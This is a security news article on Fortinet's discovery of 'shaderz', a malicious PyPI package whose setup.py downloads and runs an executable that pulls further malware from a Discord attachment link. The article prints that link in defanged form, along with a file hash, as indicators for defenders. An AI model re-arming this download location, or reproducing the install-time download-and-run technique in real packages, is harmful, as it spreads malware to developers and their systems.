Researchers at Fortinet Advanced Research Team discovered a new method employed by an unknown threat group that targets victims using the PyPI package (Python Package Index) called “shaderz.”
The research team shared an in-depth report about the malicious campaign on December 8, 2022. The team also found the same campaign lurking on the Python repository website on December 6, 2022.
According to the report, the Python package was published on December 2, 2022, and some questionable instances caught the attention.
The package didn’t have any version above the initially published 0.0.1, nor does it clearly describe what it does, its author’s address, or the source page — implying that the package could be a malicious program.
Hackers using Python packages to target victims
Upon further inspection, the researchers discovered that the package had malicious code. Within the setup.py installation script, another instance downloaded and ran an executable file on the victim’s system.
The file named “LMAO” also had a URL that took the users to the Discord app to download more malicious programs on the victim’s devices.
The URL used in the file, https://cdn[.]discordapp[.]com/attachments/1045000289708687390/1045159487079723058/stub.exe, takes the user to a Discord page to download an executable file called the stub.exe. A VirusTotal entry (SHA 256): 33df1d9c50a9bd9d3e71dc61c0a7f41f7ca51612e9c3babcea927adde169e62d, also forces another download that other threat researchers have not detected.
However, some vendors flag the downloaded executable file as malicious while looking at the URL and what it intends to do. The research team further explained the executable file and believed it to be a Python script that was compiled into an executable file.
At the time of writing, the researchers continued to unfold the campaign and prepared another report slated to help companies and threat researchers better understand the executable file.